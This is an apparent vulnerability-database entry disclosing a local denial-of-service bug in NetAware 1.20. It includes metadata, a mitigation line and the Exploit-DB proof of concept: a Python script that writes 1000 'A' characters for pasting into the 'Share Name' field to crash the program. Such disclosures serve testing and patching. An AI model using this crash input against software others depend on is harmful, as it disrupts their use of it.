header-logo
Suggest Exploit
vendor:
NetAware
by:
Alejandra Sánchez
2.6
CVSS
LOW
Denial of Service
400
CWE
Product Name: NetAware
Affected Version From: 1.20
Affected Version To: 1.20
Patch Exists: NO
Related CWE: N/A
CPE: a:infiltration_systems:netaware:1.20
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 7
2019

NetAware 1.20 – ‘Share Name’ Denial of Service (PoC)

NetAware 1.20 is vulnerable to a denial of service attack when a maliciously crafted 'Share Name' is entered into the 'Manage Shares' > 'Add a New Share...' dialog. This causes a crash of the application.

Mitigation:

Ensure that user input is properly validated and sanitized before being used.
Source

Exploit-DB raw data:

# -*- coding: utf-8 -*-
# Exploit Title: NetAware 1.20 - 'Share Name' Denial of Service (PoC)
# Date: 22/05/2019
# Author: Alejandra Sánchez
# Vendor Homepage: https://www.infiltration-systems.com
# Software: http://www.infiltration-systems.com/Files/netaware.zip
# Version: 1.20
# Tested on: Windows 7

# Proof of Concept:
# 1.- Run the python script 'NetAware_share.py', it will create a new file 'NetAware.txt'
# 2.- Copy the text from the generated NetAware.txt file to clipboard
# 3.- Open NetAware 
# 4.- Click 'Manage Shares' > 'Add a New Share...'
# 5.- Paste clipboard in the field 'Share Name', in the field 'Share Path' write anything, e.g. test and the field 'User Limit' select Maximum allowed
# 6.- Click 'Ok', you will see a crash

buffer = "\x41" * 1000

f = open ("NetAware.txt", "w")
f.write(buffer)
f.close()